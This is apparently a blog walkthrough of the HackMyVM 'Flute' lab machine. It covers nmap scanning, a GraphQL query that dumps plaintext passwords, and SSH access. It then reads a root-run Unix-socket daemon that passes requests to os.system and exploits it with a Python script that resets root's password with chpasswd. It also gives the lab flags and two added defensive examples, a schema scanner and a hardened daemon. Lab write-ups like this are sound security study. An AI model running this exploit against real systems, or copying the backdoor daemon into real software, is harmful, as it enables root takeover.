Hvm_Flute

Target source: https://hackmyvm.eu/

Difficulty: Easy

Mind map: (image)

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:33 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00094s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:AD:F2:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.12
Host is up (0.0012s latency).
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.65 seconds

Target IP: 192.168.2.12

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:33 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8888/tcp open sun-answerbook
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.44 seconds

Open ports: 22, 8888

2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,8888 192.168.2.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:34 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00073s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
8888/tcp open sun-answerbook?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, LSCP, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest, GetRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Origin: *
| Content-Type: text/html; charset=utf-8
| Content-Length: 18
| ETag: W/"12-7JEJwpG8g89ii7CR/6hhfN27Q+k"
| Date: Tue, 31 Mar 2026 09:34:48 GMT
| Connection: close
| query missing.
| HTTPOptions:
| HTTP/1.1 204 No Content
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
| Vary: Access-Control-Request-Headers
| Content-Length: 0
| Date: Tue, 31 Mar 2026 09:34:48 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 204 No Content
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
| Vary: Access-Control-Request-Headers
| Content-Length: 0
| Date: Tue, 31 Mar 2026 09:34:53 GMT
|_ Connection: close
...
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:35 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00069s latency).
All 100 scanned ports on 192.168.2.12 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 101.68 seconds

II. Web penetration

1. Port 8888

Port 8888 serves the default Apollo Server landing page. (image)

2. GraphQL

Following the usage shown in the documentation, the users' usernames and passwords can be queried directly:

curl --request POST \
  --header 'content-type: application/json' \
  --url 'http://192.168.2.12:8888/' \
  --data '{"query":"query { users { username password } }"}'

Login credentials obtained:

┌──(root㉿kali)-[~/miaosec]
└─# curl --request POST \
--header 'content-type: application/json' \
--url 'http://192.168.2.12:8888/' \
--data '{"query":"query { users { username password } }"}'
{"data":{"users":[{"username":"admin","password":"imtherealadmin"},{"username":"hamelin","password":"comewithmerats"}]}}
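The query above works because the schema exposes User.password as an ordinary queryable field. As an added check that is not part of the original write-up, this script walks a GraphQL introspection result and reports every credential-looking field reachable from the query root; the introspection JSON is constructed here to mirror the box's users/username/password schema, not captured from the target.

```python
import re

# Constructed introspection result in the shape Apollo Server returns for
# `{ __schema { queryType { name } types { name fields { name type { kind name ofType {...} } } } } }`.
# Mirrors the box's schema; not captured from the target.
INTROSPECTION = {"__schema": {"queryType": {"name": "Query"}, "types": [
    {"name": "Query", "fields": [
        {"name": "users", "type": {"kind": "LIST", "name": None,
                                   "ofType": {"kind": "OBJECT", "name": "User", "ofType": None}}}]},
    {"name": "User", "fields": [
        {"name": "username", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        {"name": "password", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]},
    {"name": "String", "fields": None},
]}}

# Field names that should never be readable through a public query.
SENSITIVE = re.compile(r"passw|secret|token|api_?key|private", re.I)


def named_type(ref):
    """Unwrap LIST / NON_NULL wrappers down to the underlying named type."""
    while ref and ref.get("name") is None:
        ref = ref.get("ofType")
    return ref["name"] if ref else None


def sensitive_paths(introspection):
    """Return dotted paths from the query root to every credential-looking field."""
    schema = introspection["__schema"]
    fields = {t["name"]: t.get("fields") or [] for t in schema["types"]}
    root = schema["queryType"]["name"]
    hits, seen = [], set()

    def walk(type_name, path):
        if type_name in seen or type_name not in fields:
            return
        seen.add(type_name)  # each type visited once; also breaks schema cycles
        for f in fields[type_name]:
            if SENSITIVE.search(f["name"]):
                hits.append(".".join(path + [f["name"]]))
            walk(named_type(f["type"]), path + [f["name"]])

    walk(root, [root])
    return hits


if __name__ == "__main__":
    for p in sensitive_paths(INTROSPECTION):
        print("exposed:", p)
```

Run the same walk over a live `__schema` response to find which fields a resolver should strip or which types need field-level authorization.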

III. Getting access as hamelin

Log in over SSH with the recovered credentials hamelin:comewithmerats:

┌──(root㉿kali)-[~]
└─# ssh hamelin@192.168.2.12
hamelin@192.168.2.12's password:
HackMyVM Flute.
flute:~$ id
uid=1000(hamelin) gid=1000(hamelin) groups=1000(hamelin)

IV. Privilege escalation

A Python script is found under /opt:

flute:~$ ls -la /opt/ratd/
total 12
drwxr-xr-x 2 root root 4096 Mar 30 09:42 .
drwxr-xr-x 3 root root 4096 Mar 30 09:41 ..
-rw-r--r-- 1 root root 527 Mar 30 09:42 ratd.py

Inspect ratd.py:

flute:~$ cat /opt/ratd/ratd.py
import socket
import os

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
socket_path = "/tmp/ratd.sock"

if os.path.exists(socket_path):
    os.remove(socket_path)

sock.bind(socket_path)
os.chmod(socket_path, 0o777)
sock.listen(1)

print("Rat daemon running...")

while True:
    conn, _ = sock.accept()
    data = conn.recv(1024).decode()

    if data.startswith("RUN "):
        cmd = data[4:]
        os.system(cmd)
        conn.send(b"OK\n")
    else:
        conn.send(b"Unknown command\n")

    conn.close()

This script is a minimal command daemon over a Unix domain socket, effectively a backdoor: it listens on a local socket file and hands whatever follows "RUN " straight to os.system(), i.e. to a shell. Because the socket is chmod'd to 0777 and the daemon runs as root, any local user can connect and have commands executed as root.

This can be exploited directly:

import socket
import os

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect("/tmp/ratd.sock")

# Send a command to the daemon: it runs as root, so this resets root's password
cmd = "RUN echo 'root:1234567' | chpasswd"
sock.send(cmd.encode())

print(sock.recv(1024).decode())
sock.close()

Root obtained:

flute:~$ nano exp.py 
flute:~$ python3 exp.py
OK

flute:~$ su root
Password: 1234567
/home/hamelin # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
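ratd.py fails in three independent ways: the socket is world-writable, the daemon never checks who connected, and the request text is passed to a shell. As an added example that is not the box's code, the hardened variant below keeps the same "RUN <name>" protocol but creates the socket 0600, verifies the peer's UID with SO_PEERCRED, and maps request names to a fixed argv list run without a shell; the allowlist entries and the socket path are assumptions.

```python
import os
import socket
import struct
import subprocess

SOCKET_PATH = "/tmp/ratd.sock"  # assumed; a root-owned, non-world-writable dir is preferable
# Assumed allowlist: request name -> argv. No shell is ever invoked.
ALLOWED = {
    "whoami": ["id", "-un"],
    "disk": ["df", "-h"],
}


def handle_request(data: bytes, peer_uid: int, allowed_uid: int) -> bytes:
    """Validate one request and return the reply bytes; only allowlisted argv runs."""
    if peer_uid != allowed_uid:
        return b"ERR unauthorized\n"
    try:
        text = data.decode("utf-8").strip()
    except UnicodeDecodeError:
        return b"ERR bad encoding\n"
    if not text.startswith("RUN "):
        return b"ERR unknown command\n"
    argv = ALLOWED.get(text[4:])  # whole remainder must be a known name
    if argv is None:
        return b"ERR command not allowed\n"
    out = subprocess.run(argv, capture_output=True, timeout=10, check=False)
    return b"OK\n" + out.stdout


def peer_uid(conn: socket.socket) -> int:
    """Linux SO_PEERCRED: struct ucred { pid_t pid; uid_t uid; gid_t gid; }."""
    creds = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    _pid, uid, _gid = struct.unpack("3i", creds)
    return uid


def serve() -> None:
    if os.path.exists(SOCKET_PATH):
        os.remove(SOCKET_PATH)
    old_umask = os.umask(0o177)  # socket node is created 0600, not chmod'd afterwards
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(SOCKET_PATH)
    os.umask(old_umask)
    sock.listen(1)
    while True:
        conn, _ = sock.accept()
        with conn:
            conn.sendall(handle_request(conn.recv(1024), peer_uid(conn), os.getuid()))


if __name__ == "__main__":
    serve()
```

With this shape a "RUN echo 'root:...' | chpasswd" request is rejected as a whole because the remainder is not an allowlisted name, and a connecting process running as another user is refused before any parsing.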

V. Reading the flags

/home/hamelin # cat /root/root.txt /home/hamelin/user.txt 
HMVrootoepsamqu0liphzzsc7x9
HMVuser9f4ndbaz4chc6j04b3va

Source: http://miao-sec.github.io/Hackmyvm/Hvm-Flute/
Author: Miao
Published: March 31, 2026
License: BY-MIAO